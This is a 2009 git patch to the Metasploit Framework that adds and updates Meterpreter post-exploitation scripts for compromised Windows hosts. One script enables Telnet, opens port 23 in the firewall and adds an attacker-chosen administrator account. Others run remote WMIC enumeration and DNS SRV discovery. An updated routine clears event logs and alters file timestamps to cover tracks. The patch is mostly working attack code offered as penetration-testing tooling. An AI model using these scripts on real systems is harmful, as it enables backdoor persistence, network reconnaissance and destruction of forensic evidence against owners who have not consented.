From e6ef0ab4952f6ffe70d70de7bccee2e49dbafa2b Mon Sep 17 00:00:00 2001 From: HD Moore Date: Fri, 30 Jan 2009 06:18:02 +0000 Subject: [PATCH] New scripts and updated scripts from Carlos Perez git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da --- scripts/meterpreter/gettelnet.rb | 201 +++++++++++++++++++++++++ scripts/meterpreter/netenum.rb | 67 +++++++-- scripts/meterpreter/remotewinenum.rb | 210 +++++++++++++++++++++++++++ scripts/meterpreter/winenum.rb | 58 +++++++- 4 files changed, 519 insertions(+), 17 deletions(-) create mode 100644 scripts/meterpreter/gettelnet.rb create mode 100644 scripts/meterpreter/remotewinenum.rb diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb new file mode 100644 index 0000000000..79196b4c05 --- /dev/null +++ b/scripts/meterpreter/gettelnet.rb @@ -0,0 +1,201 @@ +#!/usr/bin/env ruby +# +#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista +#Windows 2008 and Windows XP targets using native windows commands. +#Provided by Carlos Perez at carlos_perez[at]darkoperator.com +#Verion: 0.1.1 +#Note: If the Telnet Server is not installed in Vista or win2k8 +# it will be installed. +################## Variable Declarations ################## + +session = client +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-e" => [ false, "Enable Telnet Server only." ], + "-p" => [ true, "The Password of the user to add." ], + "-u" => [ true, "The Username of the user to add." ] + ) +def checkifinst(session) + r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ (/TlntSvr/) + return true + end + + end + r.channel.close + r.close +end + +#------------------------------------------------------------------------------- +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end + +#--------------------------------------------------------------------------------------------------------- +def insttlntsrv(session) + trgtos = winver(session) + if trgtos =~ /(Windows Vista)/ + if checkifinst(session) + print_status("Telnet Service Installed on Target") + else + print_status("Installing Telnet Server Service ......") + session.response_timeout=90 + r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + r.channel.close + r.close + end + end + end + +#--------------------------------------------------------------------------------------------------------- +def enabletlntsrv(session) + tmpout = [ ] + cmdout = [] + key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr" + root_key2, base_key2 = session.sys.registry.splitkey(key2) + value2 = "Start" + begin + open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ) + v2 = open_key.query_value(value2) + print_status "Setting Telnet Server Services service startup mode" + if v2.data != 2 + print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." + cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] + cmmds. each do |cmd| + r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + end + else + print_status "\tTelnet Server Services service is already set to auto" + end + #Enabling Exception on the Firewall + print_status "\tOpening port in local firewall if necessary" + r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def addrdpusr(session, username, password) + tmpout = [ ] + cmdout = [] + print_status "Setting user account for logon" + print_status "\tAdding User: #{username} with Password: #{password}" + begin + r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group TelnetClients" + r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group Administrators" + r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "You can now login with the created user" + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def message + print_status "Windows Telnet Server Enabler Meterpreter Script" +end +def usage + print( + "Windows Telnet Server Enabler Meterpreter Script\n" + + "Usage: getgui -u -p \n" + + @@exec_opts.usage + ) +end +################## MAIN ################## +# Parsing of Options +usr = nil +pass = nil +lport = nil +enbl = nil +@@exec_opts.parse(args) { |opt, idx, val| + case opt + when "-u" + usr = val + when "-p" + pass = val + when "-h" + usage + break + when "-n" + lport = val.to_i + when "-e" + enbl = 1 + end + +} +if enbl == 1 + message + insttlntsrv(session) + enabletlntsrv(session) + +elsif usr!= nil && pass != nil + message + insttlntsrv(session) + enabletlntsrv(session) + addrdpusr(session, usr, pass) + +else + usage +end + diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb index a7e6e55ba0..71f7fd3038 100644 --- a/scripts/meterpreter/netenum.rb +++ b/scripts/meterpreter/netenum.rb @@ -4,7 +4,7 @@ require 'ftools' #Meterpreter script for ping sweeps on Windows 2003, Windows Vista #Windows 2008 and Windows XP targets using native windows commands. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.1.1 +#Verion: 0.1.2 #Note: ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( @@ -15,7 +15,8 @@ require 'ftools' "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], "-hl" => [ true, "File with Host List for DNS Forward Lookup"], "-d" => [ true, "Domain Name for DNS Forward Lookup"], - "-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"] + "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"], + "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"] ) session = client @@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo def stdlookup(session,domain,dest) dest = dest + "-general-record-lookup.txt" print_status("Getting MX and NS Records for Domain #{domain}") - filewrt(dest,"MX and NS Records for Domain #{domain}") + filewrt(dest,"SOA, NS and MX Records for Domain #{domain}") + types = ["SOA","NS","MX"] mxout = [] results = [] garbage = [] + types.each do |t| begin - r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) mxout << d end @@ -51,17 +54,19 @@ def stdlookup(session,domain,dest) r.close results = mxout.to_s.split(/\n/) results.each do |rec| - if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/ - garbage << rec - else - print_status("\t#{rec}") - filewrt(dest,"#{rec}") - end + if rec.match(/\s*internet\saddress\s\=\s/) + garbage << rec.split(/\s*internet\saddress\s\=/) + print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ") + filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ") + garbage.clear + end + garbage.clear end rescue ::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end + end end #------------------------------------------------------------------------------- # Function for writing results of other functions to a file @@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest) end end #------------------------------------------------------------------------------- +#Function for enumerating srv records +def srvreclkp(session,domain,dest) + dest = dest + "-srvenum.txt" + srout = [] + garbage = [] + srvrcd = [ + "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.", + "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.", + "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."] + print_status("Performing SRV Record Enumeration for #{domain}") + filewrt(dest,"SRV Record Enumeration for #{domain}") + srvrcd.each do |srv| + r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + srout << d + end + r.channel.close + r.close + results = srout.to_s.split(/\n/) + results.each do |rec| + if rec.match(/\s*internet\saddress\s\=\s/) + garbage << rec.split(/\s*internet\saddress\s\=/) + print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}") + filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}") + garbage.clear + end + garbage.clear + srout.clear + end + end + +end +#------------------------------------------------------------------------------- #Function to print message during run def message(dest) print_status "Network Enumerator Meterpreter Script " @@ -231,10 +269,12 @@ frdlkp = nil dom = nil hostlist = nil helpcall = nil +srvrc = nil # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt - + when "-sr" + srvrc = 1 when "-rl" rvrslkp = 1 when "-fl" @@ -249,6 +289,7 @@ helpcall = nil hostlist = val when "-r" range = val + when "-h" print( "Network Enumerator Meterpreter Script\n" + @@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1 message(logs) frwdlp(session,hostlist,dom,dest) elsif dom != nil && stdlkp == 1 + message(logs) stdlookup(session,dom,dest) +elsif dom != nil && srvrc == 1 + message(logs) + srvreclkp(session,dom,dest) elsif helpcall == nil print( "Network Enumerator Meterpreter Script\n" + diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb new file mode 100644 index 0000000000..5b01ea36d6 --- /dev/null +++ b/scripts/meterpreter/remotewinenum.rb @@ -0,0 +1,210 @@ +#!/usr/bin/env ruby +# +#Meterpreter script for basic enumeration of Windows 2003, Windows Vista +# and Windows XP remote targets using native windows command wmic. +#Provided by Carlos Perez at carlos_perez[at]darkoperator.com +#Verion: 0.1.1 +#Note: +################## Variable Declarations ################## +session = client +# Variables for Options +helpcall = 0 +rusr = nil +rpass = nil +trg = "" +# Script Options +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu."], + "-t" => [ true, "The target address"], + "-u" => [ true, "User on the target system (If not provided it will use credential of process)"], + "-p" => [ true, "Password of user on target system"] +) + +# Create Filename info to be appended to downloaded files +filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") + +# Create a directory for the logs +logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum') + +# Create the log directory +::FileUtils.mkdir_p(logs) + +# WMIC Commands that will be executed on the Target +wmic = [ + 'environment list', + 'share list', + 'nicconfig list', + 'computersystem list', + 'useraccount list', + 'group list', + 'sysaccount list', + 'volume list brief', + 'service list brief', + 'process list brief', + 'startup list full', + 'rdtoggle list', + 'qfe list' +] +################## Function Declarations ################## + +# Function for running a list of WMIC commands stored in a array, returs string +def wmicexec(session,wmic,user,pass,trgt) + print_status("Running WMIC Commands ....") + tmpout = '' + command = nil + runfail = 0 + runningas = session.sys.config.getuid + begin + tmp = session.fs.file.expand_path("%TEMP%") + # Temporary file on windows host to store results + wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" + + wmic.each do |wmi| + if user == nil + print_status("The commands will be ran under the credentials of #{runningas}") + command = "/node:#{trgt} /append:#{wmicfl} #{wmi}" + else + command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}" + end + print_status "\trunning command wimic #{wmi}" + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + #print_status "\twmic #{command}" + r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) + sleep(2) + r.close + end + # Read the output file of the wmic commands + wmioutfile = session.fs.file.new(wmicfl, "rb") + until wmioutfile.eof? + tmpout << wmioutfile.read + end + # Close output file in host + wmioutfile.close + rescue ::Exception => e + print_status("Error running WMIC commands: #{e.class} #{e}") + end + # We delete the file with the wmic command output. + c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true}) + c.close + tmpout +end +#------------------------------------------------------------------------------- +# Function for writing results of other functions to a file +def filewrt(file2wrt, data2wrt) + output = ::File.open(file2wrt, "a") + data2wrt.each do |d| + output.puts(d) + end + output.close +end +#------------------------------------------------------------------------------ +# Function to generate report header +def headerbuid(session,target,dest) + # Header for File that will hold all the output of the commands + info = session.sys.config.sysinfo + header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n" + header << "Running as: #{client.sys.config.getuid}\n" + header << "From: #{info['Computer']}\n" + header << "OS: #{info['OS']}\n" + header << "Target: #{target}\n" + header << "\n\n\n" + + print_status("Saving report to #{dest}") + header + +end +#------------------------------------------------------------------------------ +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end + +#------------------------------------------------------------------------------ +# Function Help Message +def helpmsg + print( + "Remote Windows Enumeration Meterpreter Script\n" + + "This script will enumerate windows hosts in the target enviroment\n" + + "given a username and password or using the credential under witch\n" + + "Meterpeter is running using WMI wmic windows native tool.\n" + + "Usage:\n" + + @@exec_opts.usage + ) +end +################## MAIN ################## + +localos = winver(session) + +# Check that the command is not being ran on a Win2k host +# since wmic is not present in Windows 2000 +if localos =~ /(Windows 2000)/ + print_status("This script is not supported to be ran from Windows 2000 servers!!!") +else + # Parsing of Options + @@exec_opts.parse(args) { |opt, idx, val| + case opt + + when "-t" + trg = val + when "-u" + rusr = val + when "-p" + rpass = val + when "-h" + helpmsg + helpcall = 1 + end + + } +#logfile name +dest = logs + "/" + trg + filenameinfo +# Executing main logic of the script +if helpcall == 0 and trg != "" + +# Making sure that is running as System a Username and Password for target machine must be provided + + if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil + + print_status("Stopped: Running as System and no user provided for connecting to target!!") + + else trg != nil && helpcall != 1 + + filewrt(dest,headerbuid(session,trg,dest)) + filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg)) + + end +elsif helpcall == 0 and trg == "" + + helpmsg +end +end diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index 14f992f5d3..1958a7f5dd 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -3,7 +3,7 @@ #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista # and Windows XP targets using native windows commands. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.3.2 +#Verion: 0.3.4 #Note: Compleatly re-writen to make it modular and better error handling. # Working on adding more Virtual Machine Checks and looking at improving # the code but retain the independance of each module so it is easier for @@ -33,13 +33,18 @@ commands = [ 'ipconfig /displaydns', 'route print', 'net view', - 'netstat -na', + 'netstat -nao', + 'netstat -vb', 'netstat -ns', 'net accounts', + 'net accounts /domain', + 'net session', 'net share', 'net group', 'net user', 'net localgroup', + 'net localgroup administrators', + 'net group administrators', 'net view /domain', 'netsh firewall show config', 'tasklist /svc' @@ -62,11 +67,12 @@ cmdstomp = [ wmic = [ 'computersystem list', 'useraccount list', - 'group', + 'group list', 'service list brief', 'volume list brief', 'process list brief', 'startup list full', + 'rdtoggle list', 'qfe', ] #Specific Commands for Windows vista for Wireless Enumeration @@ -84,6 +90,12 @@ nonwin2kcmd = [ 'wbem\\wmic.exe', 'netsh.exe', ] +# Executables not pressent in Windows 2000 +nowin2kexe = [ + 'netsh.exe', + 'tasklist.exe', + 'wbem\\wmic.exe', +] ################## Function Declarations ################## # Function to check if Target Machine a VM @@ -357,7 +369,7 @@ end def covertracks(session,cmdstomp) clrevtlgs(session) info = session.sys.config.sysinfo - trgtos = info['OS'] + trgtos = winver(session) if trgtos =~ /(Windows 2000)/ chmace(session,cmdstomp - nonwin2kcmd) else @@ -488,6 +500,36 @@ def killApp(session,procpid) session.sys.process.kill(procpid) print_status("Old process #{procpid} killed.") end +#------------------------------------------------------------------------------- +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end #--------------------------------------------------------------------------------------------------------- # Function to execute process migration @@ -537,7 +579,7 @@ if helpopt != 1 header << "Host: #{info['Computer']}\n" header << "OS: #{info['OS']}\n" header << "\n\n\n" - trgtos = info['OS'] + trgtos = winver(session) print_status("Saving report to #{dest}") filewrt(dest,header) filewrt(dest,chkvm(session)) @@ -566,7 +608,11 @@ if helpopt != 1 end if (cm != nil) filewrt(dest,"EventLogs where Cleared") - covertracks(session,cmdstomp) + if trgtos =~ /(Windows 2000)/ + covertracks(session,cmdstomp - nowin2kexe) + else + covertracks(session,cmdstomp) + end end print_status("Done!") end